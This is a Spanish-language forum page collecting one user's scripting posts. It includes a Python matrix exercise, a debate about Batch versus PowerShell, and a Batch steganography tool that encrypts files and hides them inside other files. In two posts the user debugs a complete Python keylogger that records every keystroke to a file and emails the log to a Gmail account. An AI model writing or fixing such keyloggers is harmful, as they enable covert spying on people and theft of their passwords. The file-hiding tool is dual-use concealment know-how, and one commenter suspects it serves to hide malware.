elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
1  Programación / Scripting / Re: ayuda diagonal principal y secundaria phyton 3 en: 13 Mayo 2019, 16:56 pm
Había un error en el código inicial. En lugar de:

Código:
matriz[j]=contador

era:

Código:
matriz[i][j]=contador

Código
  1. fila = 3
  2. columna = 3
  3.  
  4. matriz =[]
  5. for i in range(fila):
  6.    matriz.append([0]*columna)
  7. print (matriz)
  8.  
  9. ##les da valor a la matriz 1a9
  10. contador=1
  11. for i in range(fila):
  12.    for j in range(columna):
  13.        matriz[i][j]=contador
  14.        contador+=1
  15. print(matriz)
  16.  
  17. ## ordena la matriz
  18.  
  19. for k in matriz:
  20.    print (k)
  21.  
  22. ##Diagonal principal
  23. a=[]
  24. for i in range(fila):
  25.    a.append(matriz[i][i])
  26. print(a)
  27.  
  28. ##Diagonal secundaria
  29. a=[]
  30. for i in range(fila):
  31.    a.append(matriz[i][(columna-1)-i])
  32. print(a)
  33.  

La propiedad que es buena para este tipo de problemas, es tomar en cuenta la estructura de la matriz.

Los elementos de la diagonal principal, siempre serán del tipo fila 1 columna 1, fila 2, columna 2. El 'indice' del elemento de la diagonal, coincide tanto en columnas como en filas.

Los elementos de la diagonal secundaria, son similares a los de la diagonal principal, en que su 'indice' de fila es idéntico, y la diferencia radica, en que parte del ultimo elemento de la fila, y luego va bajando.

Diagonal secundaria, de matriz n*n:
  • fila 1, columna n
  • fila 2, columna n-1
  • fila 3, columna n-2
2  Programación / Scripting / Re: Esteganografía EOF [BATCH] en: 7 Mayo 2019, 09:26 am
Eso no lo hace mejor en ningún aspecto. Lo del intérprete, le doy un pase, pero el compilador solo lo necesitas durante la etapa de desarrollo, y al finalizar tan solo tienes que distribuir la aplicación (o librería) compilada y ahí ya no dependes de nada (excepto de los runtimes de software que haya instalados en el sistema operativo, como ocurre con toda aplicación).

En Batch, para llevar a cabo casi cualquier cosa que sea realmente de utilidad, dependerás del uso de aplicaciones externas como en este caso certuril.exe, así que aunque no dependas de un intérprete externo ni compilador, si que dependes de la existencia de archivos/programas externos. Programas los cuales, como muchos otros, están sujetos a posibles cambios (en la entrada de sintaxis por linea de comandos) entre las distintas versiones de Windows, o en el peor de los casos a la obsolescencia y eliminación. Así que mucho mejor no es, si lo comparas bien.

Quizás deberías hacer caso a lo que muchos te han dicho ya. Batch es una completa pérdida de tiempo habiendo las alternativas que hay. Además ya conoces sus mayores desventajas (elaboración tediosa/complicada de código, sintáctica simplista en el mal sentido, y herramienta incompleta/carente de funcionalidades built-in, ni siquiera soporta el uso de arrays, joder, aparte de la nefasta velocidad de procesamiento de datos que tiene por naturaleza), así que no se que más motivos puede necesitar un programador para darse cuenta de que está todo en contra de tenerle preferencia a Batch como "lenguaje de programación" principal. Pero bueno, es tu decisión por los motivos que tengas y yo no insisto ni me meto en eso, pero quería dar mi opinión también.

Al menos podrías decantarte por el lenguaje Powershell, ya que tampoco hay dependencias (que no vengan ya instaladas por defecto en el S.O) y es infinitamente mejor, más completo y productivo de lo que jamás será Batch. Una grandísima ventaja de Powershell es que puedes utilizar al completo la librería de clases de .NET Framework. De hecho, incluso puedes escribir códio en C# o VB.NET en un script de PowerShell para compilar en tiempo de ejecución una librería dinámica (.dll) y llamar a los métodos compilados. Pero vamos, lo relevante sería que puedes utilizar los miembros de los espacios de nombres de la librería de clases de .NET Framework para leer los bytes de un archivo, "cortarlo" en trozos, cifrar lo que quieras a Base-64, y administrar/crear/eliminar certificados. Tampoco es que necesites recurrir a .NET Framework, casi todo lo puedes hacer con puro PowerShell. No necesitarías depender en absoluto de certutil.exe.

Un saludo.

Sí, lo de los arrays es una patada a los huevos. Después de hacer un script en Batch quede un poco inconforme, porque si deseo aplicar un método criptograma más complejo, tardaría más aun en procesar los datos y prácticamente sería inútil.

Igual fue divertido de algún modo, pero se que es un scritp que posiblemente quede obsoleto pronto.

Así que estuve leyendo un poco de Bash y Powershell. Con Get-Content y Set-Content, se puede hacer casi todo el trabajo (cortar un archivo y encriptarlo), al menos en las versiones previas a Powershell 6, desde la versión 6 se debe tener en cuenta a .Net Core.

Con .NET en Powershell se pueden hacer muchas más cosas, pero me hace falta leer :P de .NET no conozco mucho.

Fue un comentario muy constructivo, gracias.
3  Programación / Scripting / Re: Truquitos con cmd en: 7 Mayo 2019, 09:10 am
Revisa el encabezado del foro, que tiene buenos tutoriales para la mayoría de problemas. Casi todo es de Batch, aunque irónicamente cualquier otro lenguaje scripting es más potente y dinámico.

Esta es pagina es buena para consultar comandos y ejemplos:
https://ss64.com/

Además de Batch, tiene VB Script, Bash y Powershell.

Y esto, que es una descripción más detallada de los comandos:
https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/append

Si es por aprender scripting, es mejor empezar con python (o ruby), si es por automatizar tareas, en el foro creo que hay suficiente info para hacerlo.

Suerte!
4  Programación / Scripting / Re: Problema con Keylogger en Python (No envía el log) en: 7 Mayo 2019, 09:00 am
Prueba este código, creo que el error estaba en usar a yagmail antes de:

Código
  1. if __name__ == "__main__":
  2.    main()
  3.  

Código:

Código
  1. from functools import partial
  2. import atexit
  3. import os
  4. import keyboard
  5. import time, datetime
  6. import smtplib
  7. import yagmail
  8. import sys
  9.  
  10. MAP = {
  11.    "space": " ",
  12.    "\r": "\n"
  13. }
  14. # Ubicación y nombre del archivo que guarda las teclas presionadas.
  15. FILE_NAME = "C:/Users/Andrés/Desktop/keys.txt"
  16. # Determina si el archivo de salida es limpiado cada vez que se
  17. # inicia el programa.
  18. CLEAR_ON_STARTUP = False
  19. # Tecla para terminar el programa o None para no utilizar ninguna tecla.
  20. TERMINATE_KEY = "esc"
  21. def callback(output, is_down, event):
  22.    if event.event_type in ("up", "down"):
  23.        key = MAP.get(event.name, event.name)
  24.        modifier = len(key) > 1
  25.        # Capturar únicamente los modificadores cuando están siendo
  26.        # presionados.
  27.        if not modifier and event.event_type == "down":
  28.            return
  29.        # Evitar escribir múltiples veces la misma tecla si está
  30.        # siendo presionada.
  31.        if modifier:
  32.            if event.event_type == "down":
  33.                if is_down.get(key, False):
  34.                    return
  35.                else:
  36.                    is_down[key] = True
  37.            elif event.event_type == "up":
  38.                is_down[key] = False
  39.            # Indicar si está siendo presionado.
  40.            key = " [{} ({})] ".format(key, event.event_type)
  41.        elif key == "\r":
  42.            # Salto de línea.
  43.            key = "\n"
  44.        # Escribir la tecla al archivo de salida.
  45.        output.write(key)
  46.        # Forzar escritura.
  47.        output.flush()
  48. def onexit(output):
  49.    output.close()
  50. def main():
  51.    # Borrar el archivo previo.
  52.    if CLEAR_ON_STARTUP:
  53.        os.remove(FILE_NAME)
  54.  
  55.    # Indica si una tecla está siendo presionada.
  56.    is_down = {}
  57.  
  58.    # Archivo de salida.
  59.    output = open(FILE_NAME, "a")
  60.  
  61.    # Cerrar el archivo al terminar el programa.
  62.    atexit.register(onexit, output)
  63.  
  64.    # Instalar el registrador de teclas.
  65.    keyboard.hook(partial(callback, output, is_down))
  66.    keyboard.wait(TERMINATE_KEY)
  67.  
  68. if __name__ == "__main__":
  69.    main()
  70.  
  71. yag = yagmail.SMTP('correo@gmail.com', 'contraseña')
  72. yag
  73. img = "C:/Users/Andrés/Desktop/keys.txt"
  74. yag.send('correo@gmail.com', "JoJoJo", contents = [img])
  75.  

A mi me funciona correctamente, instale con un instalador el modulo keyboard, y yagmail por pip.

Si sigue fallando puede que el cortafuegos este 'atrofiando' a yagmail, como dice yumigumi.

Si falla, primero revisa, el archivo keys.txt del escritorio, si se esta escribiendo correctamente. Después si sale un error, puedes subir una captura a https://es.imgbb.com/ y despues al foro, para ver de que se trata.

Y si no sale un error, el keys.txt se escribe correctamente y las ubicaciones del archivo y el correo están bien, entonces no queda otra que revisar el cortafuegos.

Mucha suerte!
5  Programación / Scripting / [BATCH] Utilidad esteganografica: STEGANOF en: 2 Mayo 2019, 07:56 am
Hola a todos! A partir de este post:
https://foro.elhacker.net/scripting/esteganografia_eof_batch-t494405.0.html

Gracias a la ayuda de yuimugi912 con el comando certutil, pude hacer lo siguiente:

Un script en Batch, que cifra y oculta archivos por lineas de comando. Son más de 500 lineas de código.

Método, lo que hace:

  • Procesa el código hexadecimal del archivo a ocultar. Y por medio del cifrado Vigenère, lo cifra.
  • Luego, lo divide y anexa al final del código de otros archivos, ocultándolo.
  • No afecta ninguno de los archivos originales, sino que produce unos nuevos, en concreto: Los archivos con el código oculto y un archivo.log cifrado (necesario para reconstruir el archivo original)
  • El proceso de descifrado se realiza con el nombre del .log y la contraseña.

Beneficios respecto a otros ofuscadores de archivos (en Batch obivamente):

  • Es independiente, no requiere de programas adicionales del sistema.
  • No almacena la contraseña utilizada, así que para un uso casero, el cifrado es efectivo.
  • Contrario a otros métodos esteganograficos de Batch, permite añadir los datos de un archivo en varios.
  • También permite ocultar archivos de texto, al encriptarse y añadirse, son ilegibles.

A tomar en cuenta:

  • Recomiendo que los archivos sean pequeños, menores a 10 MB. Tanto el que se oculta como los que se usan para ocultar el archivo.
  • El limite de procesamiento es de 30 MB.
  • Como es Batch, no es potente, así que por eso incluyo estas limitaciones, si se introdujera un archivo cercano a los 30 MB, el script tardaría día y medio o dos días en completar el trabajo, porque el código en hex, se triplica de peso.
  • No permite archivos con espacios en el nombre, solo no quise hacer el filtro al respecto, me parecía excesivo.
  • Todos los archivos, el archivo a ocultar y los archivos donde ocultar deben estar en la misma carpeta del script.

Código completo: https://pastebin.com/zCTEmQPX

La ayuda incluida en el script:

Código
  1. echo STEGANOF: Script esteganografico. Ejecutese dentro de la carpeta con los archivos.
  2. echo Sintaxis:
  3. echo '-e' Permite cifrar y ocultar el archivo en otros archivos, con una contraseña.
  4. echo Genera un archivo .log con el cual se puede recuperar el archivo oculto.
  5. echo    STEG -e ARCHIVO_A_OCULTAR.ext CONTRASEÑA ARCHIVO2.ext ARCHIVO3.ext ARCHIVO4.ext
  6. echo '-d' Permite extraer y descifrar el archivo.
  7. echo    STEG -d ARCHIVO.log CONTRASEÑA NOMBRE_DE_ARCHIVO_OCULTO.ext
  8. echo '-t' Testea los archivos, para ver si el script puede funcionar en ellos.
  9. echo En caso de hallar algun archivo no compatible lo notifica. Si todos los
  10. echo archivos son compatibles el mensaje es nulo.
  11. echo    STEG -t ARCHIVO_A_OCULTAR.ext ARCHIVO2.ext ARCHIVO3.ext ARCHIVO4.ext
  12. echo El limite del Script esta cerca de los 30 MB.
  13. echo La velocidad varía alrededor de los 1 KB por cada 1,5 segundos. Por ello:
  14. echo Se advierte y recomienda el uso en archivos menores a 10 MB.

Espero sea de utilidad!
6  Programación / Scripting / Re: Problema con Keylogger en Python (No envía el log) en: 26 Abril 2019, 10:53 am
Prueba este código, le hice modificaciones mínimas, pero puede que sirva.
*La importación de módulos ocurre toda de una vez y al inicio.
*El valor del archivo al cual se le debe escribir, esta especificado junto a la ruta.

Código
  1. from functools import partial
  2. import time, datetime
  3. import smtplib
  4. import yagmail
  5. import sys
  6. import atexit
  7. import os
  8. import keyboard
  9.  
  10. MAP = {
  11.    "space": " ",
  12.    "\r": "\n"
  13. }
  14. # Ubicación y nombre del archivo que guarda las teclas presionadas.
  15. FILE_NAME = "C:/Users/Andrés/Desktop/keys.txt"
  16. # Determina si el archivo de salida es limpiado cada vez que se
  17. # inicia el programa.
  18. CLEAR_ON_STARTUP = False
  19. # Tecla para terminar el programa o None para no utilizar ninguna tecla.
  20. TERMINATE_KEY = "esc"
  21. def callback(output, is_down, event):
  22.    if event.event_type in ("up", "down"):
  23.        key = MAP.get(event.name, event.name)
  24.        modifier = len(key) > 1
  25.        # Capturar únicamente los modificadores cuando están siendo
  26.        # presionados.
  27.        if not modifier and event.event_type == "down":
  28.            return
  29.        # Evitar escribir múltiples veces la misma tecla si está
  30.        # siendo presionada.
  31.        if modifier:
  32.            if event.event_type == "down":
  33.                if is_down.get(key, False):
  34.                    return
  35.                else:
  36.                    is_down[key] = True
  37.            elif event.event_type == "up":
  38.                is_down[key] = False
  39.            # Indicar si está siendo presionado.
  40.            key = " [{} ({})] ".format(key, event.event_type)
  41.        elif key == "\r":
  42.            # Salto de línea.
  43.            key = "\n"
  44.        # Escribir la tecla al archivo de salida.
  45.        output.write(key)
  46.        # Forzar escritura.
  47.        output.flush()
  48. def onexit(output):
  49.    output.close()
  50. def main():
  51.    # Borrar el archivo previo.
  52.    if CLEAR_ON_STARTUP:
  53.        os.remove(FILE_NAME)
  54.  
  55.    # Indica si una tecla está siendo presionada.
  56.    is_down = {}
  57.  
  58.    # Archivo de salida.
  59.    output = open(FILE_NAME, "a")
  60.  
  61.    # Cerrar el archivo al terminar el programa.
  62.    atexit.register(onexit, output)
  63.  
  64.    # Instalar el registrador de teclas.
  65.    keyboard.hook(partial(callback, output, is_down))
  66.    keyboard.wait(TERMINATE_KEY)
  67.  
  68.  
  69. yag = yagmail.SMTP('correo@gmail.com', 'contraseña')
  70. yag
  71. img = "C:/Users/Andrés/Desktop/keys.txt"
  72. yag.send('correo@gmail.com', "Birthday", contents = [img])

Si sigue sin funcionar, luego de probarlo, cambia a Ruby que es más divertido  ;D es broma, si no funciona, voy a darle una ojeada más sería, para ver que pasa.
7  Programación / Scripting / Re: Esteganografía NTFS ADS [BATCH] en: 26 Abril 2019, 10:49 am
Gracias dijsktra  :)
8  Programación / Scripting / Re: Problema con Keylogger en Python (No envía el log) en: 22 Abril 2019, 08:29 am
En el ultimo script, creo que falta importar estos módulos. Prueba si funciona.

Código
  1. import time, datetime
  2. import smtplib
  3. import sys
  4.  

En el primer script sobra:

Código
  1. import yagmail

En el segundo script sobra:

Código
  1. import atexit
  2. import os
  3. import keyboard
  4.  
  5. if __name__ == "__main__":
  6.    main()
  7.  

Si el ultimo script sigue sin funcionar, postea que error da, o que ocurre (Por ejemplo: No envía el correo, no crea el archivo que guarda los datos). Revisar la zona de spam en el correo.

Mucha suerte!

9  Programación / Scripting / Re: Esteganografía EOF [BATCH] en: 22 Abril 2019, 08:12 am
Es una forma absurda de perder el tiempo.

Un reto tiene sentido, solo si con ello consigues algo que tenga utilidad práctica, aunque solo sea aprender. Ahí no hay aprendizaje solo ejercicio rutinario...

Pero, hacer retos donde el reto por si mismo es complicar las cosas solo porque sí (como decir: "ir desde el punto A al punto B pisando solo las baldosas 'pares' , vamos 1 de cada dos"), no ofrece absolutamente nada, yo ni lo llamaría reto, si no castigo, si además es autoimpuesto, entonces lo llamaría autofustigación, autoflagelación.

Tampoco tengo claro tu intencionalidad, a juicio mío suena a: "ofuscar algún archivo que actuará como un virus en algún momento, pero/para que pase desapercibido..."

Responder eso es una forma absurda de perder el tiempo. Y podemos seguir así todo lo que se pueda.

No nebire , el aprendizaje esta. Un comando que no conocía y puede ser de mucha utilidad, a mí o a cualquiera

Es la zona de Scripting, así que la duda esta en su lugar. Batch no requiere instalar un interprete o un compilador para usarlo. Así que puede sacarsele provecho en estas situaciones, si no se tiene una fijación o necesidad por la velocidad de procesamiento.

Lo que estaba haciendo antes de saber este comando podría clasificarse de masoquista, pero hay muchas actividades masoquistas, estudiar, trabajar, vivir. Igual que actividades de 'ocio'. Pero no viene al caso, igual que tu comentario nebire .

Mi objetivo esta especificado en la descripción del tema. Casi cualquier cosa en programación ,o pseudo-programación para este caso, puede utilizarse en la creación de un virus.

Así que a excepción de lo que he dicho en este post, francamente mi 'intencionalidad' no le incumbe, menos con esa tonalidad que a mi criterio es toxica (¿Que necesidad de responder echando basura a un tema resuelto? Ninguna).
10  Programación / Scripting / Re: Impedir que se cierre un programa (Modo Kiosko) en: 20 Abril 2019, 22:46 pm
No hay de que @alzola22 !

Saludos!
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines